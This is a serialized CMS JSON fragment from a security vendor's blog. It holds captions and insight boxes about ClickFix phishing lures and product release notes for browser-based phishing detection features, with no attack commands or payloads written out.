"value":20633,"marks":64565,"data":64566},[],{},{"nodeType":312,"data":64568,"content":64571},{"target":64569},{"sys":64570},{"id":20640,"type":317,"linkType":318},[],{"nodeType":231,"data":64573,"content":64574},{},[],{"nodeType":169,"data":64576,"content":64577},{},[64578],{"nodeType":173,"value":20649,"marks":64579,"data":64581},[64580],{"type":370},{},{"nodeType":178,"data":64583,"content":64584},{},[64585,64588,64595,64598,64605],{"nodeType":173,"value":20657,"marks":64586,"data":64587},[],{},{"nodeType":186,"data":64589,"content":64590},{"uri":8043},[64591],{"nodeType":173,"value":20664,"marks":64592,"data":64594},[64593],{"type":194},{},{"nodeType":173,"value":20669,"marks":64596,"data":64597},[],{},{"nodeType":186,"data":64599,"content":64600},{"uri":20674},[64601],{"nodeType":173,"value":20677,"marks":64602,"data":64604},[64603],{"type":194},{},{"nodeType":173,"value":20682,"marks":64606,"data":64607},[],{},{"nodeType":312,"data":64609,"content":64612},{"target":64610},{"sys":64611},{"id":20689,"type":317,"linkType":318},[],{"nodeType":178,"data":64614,"content":64615},{},[64616,64619,64626],{"nodeType":173,"value":20695,"marks":64617,"data":64618},[],{},{"nodeType":186,"data":64620,"content":64621},{"uri":20700},[64622],{"nodeType":173,"value":20703,"marks":64623,"data":64625},[64624],{"type":194},{},{"nodeType":173,"value":197,"marks":64627,"data":64628},[],{},{"nodeType":312,"data":64630,"content":64633},{"target":64631},{"sys":64632},{"id":20714,"type":317,"linkType":318},[],{"nodeType":178,"data":64635,"content":64636},{},[64637,64640,64647],{"nodeType":173,"value":20720,"marks":64638,"data":64639},[],{},{"nodeType":186,"data":64641,"content":64642},{"uri":20725},[64643],{"nodeType":173,"value":8157,"marks":64644,"data":64646},[64645],{"type":194},{},{"nodeType":173,"value":20732,"marks":64648,"data":64649},[],{},{"nodeType":178,"data":64651,"content":64652},{},[64653],{"nodeType":173,"value":20739,"marks":64654,"data":64655},[],{},{"nodeType":312,"data":64657,"content":64660},{"target":64658},{"sys":64659},{"id":20746,"type":317,"linkType":318},[],{"nodeType":231,"data":64662,"content":64663},{},[],{"nodeType":169,"data":64665,"content":64666},{},[64667],{"nodeType":173,"value":20755,"marks":64668,"data":64670},[64669],{"type":370},{},{"nodeType":178,"data":64672,"content":64673},{},[64674],{"nodeType":173,"value":20763,"marks":64675,"data":64676},[],{},{"nodeType":178,"data":64678,"content":64679},{},[64680,64683,64690],{"nodeType":173,"value":20770,"marks":64681,"data":64682},[],{},{"nodeType":186,"data":64684,"content":64685},{"uri":20775},[64686],{"nodeType":173,"value":20778,"marks":64687,"data":64689},[64688],{"type":194},{},{"nodeType":173,"value":20783,"marks":64691,"data":64692},[],{},{"nodeType":178,"data":64694,"content":64695},{},[64696],{"nodeType":173,"value":20790,"marks":64697,"data":64698},[],{},{"nodeType":178,"data":64700,"content":64701},{},[64702,64705,64712],{"nodeType":173,"value":20797,"marks":64703,"data":64704},[],{},{"nodeType":186,"data":64706,"content":64707},{"uri":20802},[64708],{"nodeType":173,"value":20805,"marks":64709,"data":64711},[64710],{"type":194},{},{"nodeType":173,"value":20810,"marks":64713,"data":64714},[],{},{"nodeType":178,"data":64716,"content":64717},{},[64718],{"nodeType":173,"value":20817,"marks":64719,"data":64720},[],{},{"nodeType":312,"data":64722,"content":64725},{"target":64723},{"sys":64724},{"id":20824,"type":317,"linkType":318},[],{"nodeType":231,"data":64727,"content":64728},{},[],{"nodeType":169,"data":64730,"content":64731},{},[64732],{"nodeType":173,"value":20833,"marks":64733,"data":64735},[64734],{"type":370},{},{"nodeType":178,"data":64737,"content":64738},{},[64739],{"nodeType":173,"value":20841,"marks":64740,"data":64741},[],{},{"nodeType":250,"data":64743,"content":64744},{},[64745,64754,64763],{"nodeType":254,"data":64746,"content":64747},{},[64748],{"nodeType":178,"data":64749,"content":64750},{},[64751],{"nodeType":173,"value":20854,"marks":64752,"data":64753},[],{},{"nodeType":254,"data":64755,"content":64756},{},[64757],{"nodeType":178,"data":64758,"content":64759},{},[64760],{"nodeType":173,"value":20864,"marks":64761,"data":64762},[],{},{"nodeType":254,"data":64764,"content":64765},{},[64766],{"nodeType":178,"data":64767,"content":64768},{},[64769],{"nodeType":173,"value":20874,"marks":64770,"data":64771},[],{},{"nodeType":178,"data":64773,"content":64774},{},[64775],{"nodeType":173,"value":20881,"marks":64776,"data":64777},[],{},{"nodeType":178,"data":64779,"content":64780},{},[64781],{"nodeType":173,"value":20888,"marks":64782,"data":64783},[],{},{"nodeType":250,"data":64785,"content":64786},{},[64787,64806,64815],{"nodeType":254,"data":64788,"content":64789},{},[64790],{"nodeType":178,"data":64791,"content":64792},{},[64793,64796,64803],{"nodeType":173,"value":20901,"marks":64794,"data":64795},[],{},{"nodeType":186,"data":64797,"content":64798},{"uri":20906},[64799],{"nodeType":173,"value":20909,"marks":64800,"data":64802},[64801],{"type":194},{},{"nodeType":173,"value":20914,"marks":64804,"data":64805},[],{},{"nodeType":254,"data":64807,"content":64808},{},[64809],{"nodeType":178,"data":64810,"content":64811},{},[64812],{"nodeType":173,"value":20924,"marks":64813,"data":64814},[],{},{"nodeType":254,"data":64816,"content":64817},{},[64818],{"nodeType":178,"data":64819,"content":64820},{},[64821],{"nodeType":173,"value":20934,"marks":64822,"data":64823},[],{},{"nodeType":178,"data":64825,"content":64826},{},[64827,64830,64836],{"nodeType":173,"value":20941,"marks":64828,"data":64829},[],{},{"nodeType":186,"data":64831,"content":64832},{"uri":1252},[64833],{"nodeType":173,"value":20948,"marks":64834,"data":64835},[],{},{"nodeType":173,"value":20952,"marks":64837,"data":64838},[],{},{"nodeType":3769,"data":64840,"content":64841},{},[64842],{"nodeType":178,"data":64843,"content":64844},{},[64845],{"nodeType":173,"value":20962,"marks":64846,"data":64847},[],{},{"nodeType":178,"data":64849,"content":64850},{},[64851],{"nodeType":173,"value":20969,"marks":64852,"data":64853},[],{},{"nodeType":231,"data":64855,"content":64856},{},[],{"nodeType":169,"data":64858,"content":64859},{},[64860],{"nodeType":173,"value":20979,"marks":64861,"data":64863},[64862],{"type":370},{},{"nodeType":178,"data":64865,"content":64866},{},[64867,64870,64877],{"nodeType":173,"value":20987,"marks":64868,"data":64869},[],{},{"nodeType":186,"data":64871,"content":64872},{"uri":20992},[64873],{"nodeType":173,"value":20995,"marks":64874,"data":64876},[64875],{"type":194},{},{"nodeType":173,"value":21000,"marks":64878,"data":64879},[],{},{"nodeType":178,"data":64881,"content":64882},{},[64883],{"nodeType":173,"value":21007,"marks":64884,"data":64885},[],{},{"nodeType":178,"data":64887,"content":64888},{},[64889],{"nodeType":173,"value":21014,"marks":64890,"data":64891},[],{},{"nodeType":312,"data":64893,"content":64896},{"target":64894},{"sys":64895},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":64898,"content":64899},{},[],{"nodeType":169,"data":64901,"content":64902},{},[64903],{"nodeType":173,"value":18605,"marks":64904,"data":64906},[64905],{"type":370},{},{"nodeType":178,"data":64908,"content":64909},{},[64910,64913,64920],{"nodeType":173,"value":21037,"marks":64911,"data":64912},[],{},{"nodeType":186,"data":64914,"content":64915},{"uri":21042},[64916],{"nodeType":173,"value":21045,"marks":64917,"data":64919},[64918],{"type":194},{},{"nodeType":173,"value":21050,"marks":64921,"data":64922},[],{},{"nodeType":178,"data":64924,"content":64925},{},[64926,64929,64936,64939,64946],{"nodeType":173,"value":1451,"marks":64927,"data":64928},[],{},{"nodeType":186,"data":64930,"content":64931},{"uri":1456},[64932],{"nodeType":173,"value":1459,"marks":64933,"data":64935},[64934],{"type":194},{},{"nodeType":173,"value":1464,"marks":64937,"data":64938},[],{},{"nodeType":186,"data":64940,"content":64941},{"uri":1469},[64942],{"nodeType":173,"value":1472,"marks":64943,"data":64945},[64944],{"type":194},{},{"nodeType":173,"value":1477,"marks":64947,"data":64948},[],{},{"nodeType":312,"data":64950,"content":64953},{"target":64951},{"sys":64952},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":64955,"content":64956},{},[64957],{"nodeType":173,"value":37,"marks":64958,"data":64959},[],{},{"entries":64961},{"hyperlink":64962,"inline":64963,"block":64964},[],[],[64965,64967,64972,64976,64999,65006,65020,65026],{"sys":64966,"__typename":5434,"title":21090,"arcadeDemoUrl":51634,"playText":27947},{"id":8032},{"sys":64968,"__typename":5345,"title":64969,"caption":64969,"layoutMode":118,"file":64970},{"id":20581},"The most advanced ClickFix page we’ve seen — complete with an embedded video showing the victim how to complete the check.",{"url":64971,"width":5358,"height":49192},"https://images.ctfassets.net/y1cdw1ablpvd/ImveC0bIdp4QxXqHyQKz9/526f7ae589f71d0c23c7c738b8d0bc90/image3.png",{"sys":64973,"__typename":15269,"type":15270,"ctaText":64974,"buttonLabel":64975,"buttonColour":15273,"buttonUrl":21042},{"id":20640},"Check out our latest webinar for a deep dive into the evolution of ClickFix-style attacks, with real-world examples from investigations.","Watch On-demand",{"sys":64977,"__typename":5311,"content":64978,"name":64998,"title":118},{"id":20689},{"json":64979},{"data":64980,"content":64981,"nodeType":165},{},[64982],{"data":64983,"content":64984,"nodeType":178},{},[64985,64989,64994],{"data":64986,"marks":64987,"value":64988,"nodeType":173},{},[],"Of the ClickFix pages intercepted by Push where the delivery vector was observed, ",{"data":64990,"marks":64991,"value":64993,"nodeType":173},{},[64992],{"type":370},"4 in 5 were accessed via Google Search.",{"data":64995,"marks":64996,"value":64997,"nodeType":173},{},[]," While other examples may have been stopped by controls such as email before the page could be loaded by the user, this shows a significant monitoring gap when it comes to non-email delivery vectors.","ClickFix blog insight box 2",{"sys":65000,"__typename":5345,"title":65001,"caption":65001,"layoutMode":118,"file":65002},{"id":20714},"Like other modern phishing attacks, ClickFix lures are distributed all over the internet — not just email.",{"url":65003,"width":65004,"height":65005},"https://images.ctfassets.net/y1cdw1ablpvd/4l0xLRs8Z1w3aXMbzzyFPL/9cb4721c53379da31a4019371072a7ef/image1.png",1696,986,{"sys":65007,"__typename":5311,"content":65008,"name":65019,"title":118},{"id":20746},{"json":65009},{"data":65010,"content":65011,"nodeType":165},{},[65012],{"data":65013,"content":65014,"nodeType":178},{},[65015],{"data":65016,"marks":65017,"value":65018,"nodeType":173},{},[],"Although there are ways to block web pages from performing copy to clipboard via device settings or group policy, the practical reality of ClickFix means that these methods are not effective. Because ClickFix is a user gesture initiated paste event (some form of user interaction such as a button press is required on the page before loading the ClickFix lure) it cannot be blocked from the host.","ClickFix insight box 1",{"sys":65021,"__typename":5345,"title":65022,"caption":65022,"layoutMode":118,"file":65023},{"id":20824},"The current hybrid attack path sees the attacker deliver lures in the browser, to compromise the endpoint, to get access to creds and cookies stored in the browser. What if you could skip the endpoint altogether? ",{"url":65024,"width":65025,"height":27942},"https://images.ctfassets.net/y1cdw1ablpvd/7kIZUmQkiHKKX0kjZQYfia/a7957baa43f54fe407779e845240e27e/image2.png",1970,{"sys":65027,"__typename":5434,"title":46386,"arcadeDemoUrl":46387,"playText":5437},{"id":21021},"content:blog:the-most-advanced-clickfix-yet.json","blog/the-most-advanced-clickfix-yet.json","blog/the-most-advanced-clickfix-yet",{"_path":65032,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":65033,"ogImage":118,"summary":65035,"title":19114,"subtitle":118,"metaTitle":65046,"synopsis":19115,"hashTags":118,"publishedDate":19116,"slug":19117,"tagsCollection":65047,"relatedBlogPostsCollection":65051,"authorsCollection":66089,"content":66093,"_id":66772,"_type":5439,"_source":5440,"_file":66773,"_stem":66774,"_extension":5439},"/blog/product-release-november-2025",{"id":18404,"publishedAt":65034},"2025-11-07T21:07:26.267Z",{"json":65036},{"data":65037,"content":65038,"nodeType":165},{},[65039],{"data":65040,"content":65041,"nodeType":178},{},[65042],{"data":65043,"marks":65044,"value":65045,"nodeType":173},{},[],"Browser extension visibility, ClickFix detection, RBAC and more.","Push Security new product features for November 2025",{"items":65048},[65049],{"sys":65050,"name":18399},{"id":18398},{"items":65052},[65053,65606],{"__typename":1528,"sys":65054,"content":65056,"title":65595,"synopsis":65596,"hashTags":118,"publishedDate":59482,"slug":65597,"tagsCollection":65598,"authorsCollection":65602},{"id":65055},"5QZCp0CTUoF0V7yZ8WnQrr",{"json":65057},{"data":65058,"content":65059,"nodeType":165},{},[65060,65067,65140,65146,65160,65208,65249,65255,65272,65278,65300,65327,65333,65350,65356,65363,65370,65394,65412,65419,65435,65442,65487,65493,65499,65506,65522,65540,65547,65554,65577],{"data":65061,"content":65062,"nodeType":169},{},[65063],{"data":65064,"marks":65065,"value":65066,"nodeType":173},{},[],"What’s new this month:",{"data":65068,"content":65069,"nodeType":250},{},[65070,65080,65090,65100,65110,65120,65130],{"data":65071,"content":65072,"nodeType":254},{},[65073],{"data":65074,"content":65075,"nodeType":178},{},[65076],{"data":65077,"marks":65078,"value":65079,"nodeType":173},{},[],"Attack timeline, screenshots & classifications for Detections",{"data":65081,"content":65082,"nodeType":254},{},[65083],{"data":65084,"content":65085,"nodeType":178},{},[65086],{"data":65087,"marks":65088,"value":65089,"nodeType":173},{},[],"Block cloned login pages",{"data":65091,"content":65092,"nodeType":254},{},[65093],{"data":65094,"content":65095,"nodeType":178},{},[65096],{"data":65097,"marks":65098,"value":65099,"nodeType":173},{},[],"Block URL schema obfuscation",{"data":65101,"content":65102,"nodeType":254},{},[65103],{"data":65104,"content":65105,"nodeType":178},{},[65106],{"data":65107,"marks":65108,"value":65109,"nodeType":173},{},[],"Identify browsers synced to personal profiles",{"data":65111,"content":65112,"nodeType":254},{},[65113],{"data":65114,"content":65115,"nodeType":178},{},[65116],{"data":65117,"marks":65118,"value":65119,"nodeType":173},{},[],"Enhanced dashboard",{"data":65121,"content":65122,"nodeType":254},{},[65123],{"data":65124,"content":65125,"nodeType":178},{},[65126],{"data":65127,"marks":65128,"value":65129,"nodeType":173},{},[],"Configure a custom data retention period",{"data":65131,"content":65132,"nodeType":254},{},[65133],{"data":65134,"content":65135,"nodeType":178},{},[65136],{"data":65137,"marks":65138,"value":65139,"nodeType":173},{},[],"Debug logs for SIEM & webhooks integrations",{"data":65141,"content":65142,"nodeType":169},{},[65143],{"data":65144,"marks":65145,"value":65079,"nodeType":173},{},[],{"data":65147,"content":65148,"nodeType":178},{},[65149,65153,65157],{"data":65150,"marks":65151,"value":65152,"nodeType":173},{},[],"You can now get deeper context and telemetry to investigate attacks that Push intercepts in the browser using these recently released enrichments for Push’s ",{"data":65154,"marks":65155,"value":19231,"nodeType":173},{},[65156],{"type":370},{"data":65158,"marks":65159,"value":39946,"nodeType":173},{},[],{"data":65161,"content":65162,"nodeType":250},{},[65163,65178,65193],{"data":65164,"content":65165,"nodeType":254},{},[65166],{"data":65167,"content":65168,"nodeType":178},{},[65169,65174],{"data":65170,"marks":65171,"value":65173,"nodeType":173},{},[65172],{"type":370},"Timeline:",{"data":65175,"marks":65176,"value":65177,"nodeType":173},{},[]," An attack timeline of where a phishing link originated, how a user interacted with the page, and how Push responded.",{"data":65179,"content":65180,"nodeType":254},{},[65181],{"data":65182,"content":65183,"nodeType":178},{},[65184,65189],{"data":65185,"marks":65186,"value":65188,"nodeType":173},{},[65187],{"type":370},"Screenshots:",{"data":65190,"marks":65191,"value":65192,"nodeType":173},{},[]," Optional screenshots of the suspicious page, to quickly triage detections.",{"data":65194,"content":65195,"nodeType":254},{},[65196],{"data":65197,"content":65198,"nodeType":178},{},[65199,65204],{"data":65200,"marks":65201,"value":65203,"nodeType":173},{},[65202],{"type":370},"Blast radius:",{"data":65205,"marks":65206,"value":65207,"nodeType":173},{},[]," A view of the impact of this attack and whether other apps are also compromised or at risk as a result.",{"data":65209,"content":65210,"nodeType":178},{},[65211,65215,65220,65223,65228,65232,65237,65241,65246],{"data":65212,"marks":65213,"value":65214,"nodeType":173},{},[],"You can also now classify a detection to record the outcome of your investigation. Options include: ",{"data":65216,"marks":65217,"value":65219,"nodeType":173},{},[65218],{"type":370},"true positive",{"data":65221,"marks":65222,"value":2936,"nodeType":173},{},[],{"data":65224,"marks":65225,"value":65227,"nodeType":173},{},[65226],{"type":370},"benign true positive",{"data":65229,"marks":65230,"value":65231,"nodeType":173},{},[]," (such as a detection triggered by a phishing simulation exercise), and ",{"data":65233,"marks":65234,"value":65236,"nodeType":173},{},[65235],{"type":370},"false positive",{"data":65238,"marks":65239,"value":65240,"nodeType":173},{},[],". The default state is ",{"data":65242,"marks":65243,"value":65245,"nodeType":173},{},[65244],{"type":370},"not classified",{"data":65247,"marks":65248,"value":1477,"nodeType":173},{},[],{"data":65250,"content":65254,"nodeType":312},{"target":65251},{"sys":65252},{"id":65253,"type":317,"linkType":318},"2IMRHDY5ShjsquyaW7hB5M",[],{"data":65256,"content":65257,"nodeType":178},{},[65258,65261,65269],{"data":65259,"marks":65260,"value":37,"nodeType":173},{},[],{"data":65262,"content":65265,"nodeType":1698},{"target":65263},{"sys":65264},{"id":24428,"type":317,"linkType":318},[65266],{"data":65267,"marks":65268,"value":18605,"nodeType":173},{},[],{"data":65270,"marks":65271,"value":37,"nodeType":173},{},[],{"data":65273,"content":65274,"nodeType":169},{},[65275],{"data":65276,"marks":65277,"value":65089,"nodeType":173},{},[],{"data":65279,"content":65280,"nodeType":178},{},[65281,65285,65289,65292,65296],{"data":65282,"marks":65283,"value":65284,"nodeType":173},{},[],"You can now ",{"data":65286,"marks":65287,"value":2740,"nodeType":173},{},[65288],{"type":370},{"data":65290,"marks":65291,"value":1464,"nodeType":173},{},[],{"data":65293,"marks":65294,"value":2748,"nodeType":173},{},[65295],{"type":370},{"data":65297,"marks":65298,"value":65299,"nodeType":173},{},[]," employees when Push detects that they’re visiting a cloned login page.",{"data":65301,"content":65302,"nodeType":178},{},[65303,65307,65311,65315,65319,65323],{"data":65304,"marks":65305,"value":24353,"nodeType":173},{},[65306],{"type":370},{"data":65308,"marks":65309,"value":65310,"nodeType":173},{},[],", which you can configure on the ",{"data":65312,"marks":65313,"value":18649,"nodeType":173},{},[65314],{"type":370},{"data":65316,"marks":65317,"value":65318,"nodeType":173},{},[]," page of the Push admin console, has become a highly effective and low false-positive control. We recommend that you move to using ",{"data":65320,"marks":65321,"value":2748,"nodeType":173},{},[65322],{"type":370},{"data":65324,"marks":65325,"value":65326,"nodeType":173},{},[]," mode for your organization — if you’re not already!",{"data":65328,"content":65332,"nodeType":312},{"target":65329},{"sys":65330},{"id":65331,"type":317,"linkType":318},"4auXExHqaYtu44zTFGh47s",[],{"data":65334,"content":65335,"nodeType":178},{},[65336,65339,65347],{"data":65337,"marks":65338,"value":37,"nodeType":173},{},[],{"data":65340,"content":65343,"nodeType":1698},{"target":65341},{"sys":65342},{"id":2171,"type":317,"linkType":318},[65344],{"data":65345,"marks":65346,"value":18605,"nodeType":173},{},[],{"data":65348,"marks":65349,"value":37,"nodeType":173},{},[],{"data":65351,"content":65352,"nodeType":169},{},[65353],{"data":65354,"marks":65355,"value":65109,"nodeType":173},{},[],{"data":65357,"content":65358,"nodeType":178},{},[65359],{"data":65360,"marks":65361,"value":65362,"nodeType":173},{},[],"The Push browser extension can now identify the email address that’s used to log in to a browser, as well as whether browser sync is enabled.",{"data":65364,"content":65365,"nodeType":178},{},[65366],{"data":65367,"marks":65368,"value":65369,"nodeType":173},{},[],"Using this data, you can see whether any employees are signed in to work browsers with non-company identities and syncing their browsers, which can result in work credentials being synced to personal profiles. ",{"data":65371,"content":65372,"nodeType":178},{},[65373,65377,65382,65386,65390],{"data":65374,"marks":65375,"value":65376,"nodeType":173},{},[],"To find this data, go to the Push admin console and view the ",{"data":65378,"marks":65379,"value":65381,"nodeType":173},{},[65380],{"type":370},"Browsers",{"data":65383,"marks":65384,"value":65385,"nodeType":173},{},[]," page under ",{"data":65387,"marks":65388,"value":18547,"nodeType":173},{},[65389],{"type":370},{"data":65391,"marks":65392,"value":65393,"nodeType":173},{},[]," in the left toolbar.",{"data":65395,"content":65396,"nodeType":178},{},[65397,65400,65409],{"data":65398,"marks":65399,"value":37,"nodeType":173},{},[],{"data":65401,"content":65405,"nodeType":1698},{"target":65402},{"sys":65403},{"id":65404,"type":317,"linkType":318},"2IS6Dbz1fnJZrDfrMSTFQd",[65406],{"data":65407,"marks":65408,"value":18605,"nodeType":173},{},[],{"data":65410,"marks":65411,"value":37,"nodeType":173},{},[],{"data":65413,"content":65414,"nodeType":169},{},[65415],{"data":65416,"marks":65417,"value":65418,"nodeType":173},{},[],"Enhanced dashboard for easier monitoring",{"data":65420,"content":65421,"nodeType":178},{},[65422,65426,65431],{"data":65423,"marks":65424,"value":65425,"nodeType":173},{},[],"We’ve improved the data and design of the Push admin console ",{"data":65427,"marks":65428,"value":65430,"nodeType":173},{},[65429],{"type":370},"Dashboard",{"data":65432,"marks":65433,"value":65434,"nodeType":173},{},[]," so you can keep track of the important developments in your environment.",{"data":65436,"content":65437,"nodeType":178},{},[65438],{"data":65439,"marks":65440,"value":65441,"nodeType":173},{},[],"A few of the changes:",{"data":65443,"content":65444,"nodeType":250},{},[65445,65463,65477],{"data":65446,"content":65447,"nodeType":254},{},[65448],{"data":65449,"content":65450,"nodeType":178},{},[65451,65455,65459],{"data":65452,"marks":65453,"value":65454,"nodeType":173},{},[],"A snapshot of recent ",{"data":65456,"marks":65457,"value":19231,"nodeType":173},{},[65458],{"type":370},{"data":65460,"marks":65461,"value":65462,"nodeType":173},{},[]," activity",{"data":65464,"content":65465,"nodeType":254},{},[65466],{"data":65467,"content":65468,"nodeType":178},{},[65469,65473],{"data":65470,"marks":65471,"value":65472,"nodeType":173},{},[],"An overview of all events on the platform, including activity related to ",{"data":65474,"marks":65475,"value":18649,"nodeType":173},{},[65476],{"type":370},{"data":65478,"content":65479,"nodeType":254},{},[65480],{"data":65481,"content":65482,"nodeType":178},{},[65483],{"data":65484,"marks":65485,"value":65486,"nodeType":173},{},[],"Performance improvements so the page load is fast for even very large deployments",{"data":65488,"content":65492,"nodeType":312},{"target":65489},{"sys":65490},{"id":65491,"type":317,"linkType":318},"4kqqwOPsN7VhLeQdrV15bH",[],{"data":65494,"content":65495,"nodeType":169},{},[65496],{"data":65497,"marks":65498,"value":65129,"nodeType":173},{},[],{"data":65500,"content":65501,"nodeType":178},{},[65502],{"data":65503,"marks":65504,"value":65505,"nodeType":173},{},[],"You can now configure how long activity data will be retained in Push by configuring a data retention period. ",{"data":65507,"content":65508,"nodeType":178},{},[65509,65513,65518],{"data":65510,"marks":65511,"value":65512,"nodeType":173},{},[],"From the admin console, go to ",{"data":65514,"marks":65515,"value":65517,"nodeType":173},{},[65516],{"type":370},"Settings > Organization > Data retention",{"data":65519,"marks":65520,"value":65521,"nodeType":173},{},[]," and select the data retention period in years.",{"data":65523,"content":65524,"nodeType":178},{},[65525,65528,65537],{"data":65526,"marks":65527,"value":37,"nodeType":173},{},[],{"data":65529,"content":65533,"nodeType":1698},{"target":65530},{"sys":65531},{"id":65532,"type":317,"linkType":318},"4esJSEUrMN2hpbghIkXjDG",[65534],{"data":65535,"marks":65536,"value":18605,"nodeType":173},{},[],{"data":65538,"marks":65539,"value":37,"nodeType":173},{},[],{"data":65541,"content":65542,"nodeType":169},{},[65543],{"data":65544,"marks":65545,"value":65546,"nodeType":173},{},[],"Easier debugging for webhook or integration error messages",{"data":65548,"content":65549,"nodeType":178},{},[65550],{"data":65551,"marks":65552,"value":65553,"nodeType":173},{},[],"We’ve added a debug log to make it easier to see what’s not working when you receive an error related to your Push webhooks or SIEM integrations.",{"data":65555,"content":65556,"nodeType":178},{},[65557,65561,65566,65569,65574],{"data":65558,"marks":65559,"value":65560,"nodeType":173},{},[],"You can access the debug log by opening the details slideout in the Push admin console for the webhook or integration you’ve created. Go to ",{"data":65562,"marks":65563,"value":65565,"nodeType":173},{},[65564],{"type":370},"Settings > Webhooks",{"data":65567,"marks":65568,"value":1464,"nodeType":173},{},[],{"data":65570,"marks":65571,"value":65573,"nodeType":173},{},[65572],{"type":370},"Settings > Integrations",{"data":65575,"marks":65576,"value":1477,"nodeType":173},{},[],{"data":65578,"content":65579,"nodeType":178},{},[65580,65583,65592],{"data":65581,"marks":65582,"value":37,"nodeType":173},{},[],{"data":65584,"content":65588,"nodeType":1698},{"target":65585},{"sys":65586},{"id":65587,"type":317,"linkType":318},"2naceBODKDL3iw72wrce6E",[65589],{"data":65590,"marks":65591,"value":18605,"nodeType":173},{},[],{"data":65593,"marks":65594,"value":37,"nodeType":173},{},[],"Product release: September 2025","Here’s what’s new on the Push platform for September 2025.","product-release-september-2025",{"items":65599},[65600],{"sys":65601,"name":18399},{"id":18398},{"items":65603},[65604],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":65605},{"url":19129},{"__typename":1528,"sys":65607,"content":65609,"title":66077,"synopsis":66078,"hashTags":118,"publishedDate":66079,"slug":66080,"tagsCollection":66081,"authorsCollection":66085},{"id":65608},"20xOvhmIKW7E0e1g5q7D2h",{"json":65610},{"data":65611,"content":65612,"nodeType":165},{},[65613,65619,65692,65698,65714,65721,65727,65745,65751,65767,65774,65781,65805,65810,65816,65830,65837,65843,65860,65866,65882,65889,65896,65902,65920,65926,65941,65948,65954,65970,65976,66007,66022,66028,66044,66050,66065,66071],{"data":65614,"content":65615,"nodeType":169},{},[65616],{"data":65617,"marks":65618,"value":18415,"nodeType":173},{},[],{"data":65620,"content":65621,"nodeType":250},{},[65622,65632,65642,65652,65662,65672,65682],{"data":65623,"content":65624,"nodeType":254},{},[65625],{"data":65626,"content":65627,"nodeType":178},{},[65628],{"data":65629,"marks":65630,"value":65631,"nodeType":173},{},[],"Streamline investigations with Detections page",{"data":65633,"content":65634,"nodeType":254},{},[65635],{"data":65636,"content":65637,"nodeType":178},{},[65638],{"data":65639,"marks":65640,"value":65641,"nodeType":173},{},[],"New Labs feature: Employee verification codes",{"data":65643,"content":65644,"nodeType":254},{},[65645],{"data":65646,"content":65647,"nodeType":178},{},[65648],{"data":65649,"marks":65650,"value":65651,"nodeType":173},{},[],"Enforce strong passwords with in-browser guardrails",{"data":65653,"content":65654,"nodeType":254},{},[65655],{"data":65656,"content":65657,"nodeType":178},{},[65658],{"data":65659,"marks":65660,"value":65661,"nodeType":173},{},[],"Merge related employee records",{"data":65663,"content":65664,"nodeType":254},{},[65665],{"data":65666,"content":65667,"nodeType":178},{},[65668],{"data":65669,"marks":65670,"value":65671,"nodeType":173},{},[],"Customize your webhook events",{"data":65673,"content":65674,"nodeType":254},{},[65675],{"data":65676,"content":65677,"nodeType":178},{},[65678],{"data":65679,"marks":65680,"value":65681,"nodeType":173},{},[],"Create rules for phishing tool detection and MFA enforcement",{"data":65683,"content":65684,"nodeType":254},{},[65685],{"data":65686,"content":65687,"nodeType":178},{},[65688],{"data":65689,"marks":65690,"value":65691,"nodeType":173},{},[],"New integration for Microsoft Sentinel",{"data":65693,"content":65694,"nodeType":169},{},[65695],{"data":65696,"marks":65697,"value":65631,"nodeType":173},{},[],{"data":65699,"content":65700,"nodeType":178},{},[65701,65705,65710],{"data":65702,"marks":65703,"value":65704,"nodeType":173},{},[],"You can now receive and triage detections in the Push admin console (or get them via the Push REST API, webhooks or ChatOps), giving you a ",{"data":65706,"marks":65707,"value":65709,"nodeType":173},{},[65708],{"type":370},"single view of all the security events that Push has detected",{"data":65711,"marks":65712,"value":65713,"nodeType":173},{},[],", such as AiTM phishing, stolen creds, or blocked URLs being visited by employees.",{"data":65715,"content":65716,"nodeType":178},{},[65717],{"data":65718,"marks":65719,"value":65720,"nodeType":173},{},[]," Use the additional telemetry about each detection, such as timestamp, detection URL, type of phishkit detected, Push response action, etc., to understand how to triage the incident. ",{"data":65722,"content":65726,"nodeType":312},{"target":65723},{"sys":65724},{"id":65725,"type":317,"linkType":318},"53BOccCQ72Yo3oCSUWVFXn",[],{"data":65728,"content":65729,"nodeType":178},{},[65730,65733,65742],{"data":65731,"marks":65732,"value":37,"nodeType":173},{},[],{"data":65734,"content":65738,"nodeType":1698},{"target":65735},{"sys":65736},{"id":65737,"type":317,"linkType":318},"6jbLw9Wi2JuddCXL6ncrCV",[65739],{"data":65740,"marks":65741,"value":18605,"nodeType":173},{},[],{"data":65743,"marks":65744,"value":37,"nodeType":173},{},[],{"data":65746,"content":65747,"nodeType":169},{},[65748],{"data":65749,"marks":65750,"value":65641,"nodeType":173},{},[],{"data":65752,"content":65753,"nodeType":178},{},[65754,65758,65763],{"data":65755,"marks":65756,"value":65757,"nodeType":173},{},[],"Employees can now get a 6-digit verification code via the Push browser extension that you can use to ",{"data":65759,"marks":65760,"value":65762,"nodeType":173},{},[65761],{"type":370},"validate that your help desk is speaking to someone from your organization",{"data":65764,"marks":65765,"value":65766,"nodeType":173},{},[],".  ",{"data":65768,"content":65769,"nodeType":178},{},[65770],{"data":65771,"marks":65772,"value":65773,"nodeType":173},{},[],"The verification code is the same for all employees at a given organization, and resets every 24 hours. If your help desk needs to verify that they’re speaking to an employee, they can ask them to open the details tray for their Push extension and verify the code.",{"data":65775,"content":65776,"nodeType":178},{},[65777],{"data":65778,"marks":65779,"value":65780,"nodeType":173},{},[],"Employee verification codes is a Labs feature, which means it’s available on an early-access basis and we're particularly interested in hearing from you if this is a problem you're interested in solving using Push. ",{"data":65782,"content":65783,"nodeType":178},{},[65784,65788,65792,65796,65801],{"data":65785,"marks":65786,"value":65787,"nodeType":173},{},[],"You can enable Labs features by going to the ",{"data":65789,"marks":65790,"value":2789,"nodeType":173},{},[65791],{"type":370},{"data":65793,"marks":65794,"value":65795,"nodeType":173},{},[]," page of the Push admin console and choosing the ",{"data":65797,"marks":65798,"value":65800,"nodeType":173},{},[65799],{"type":370},"Labs",{"data":65802,"marks":65803,"value":65804,"nodeType":173},{},[]," 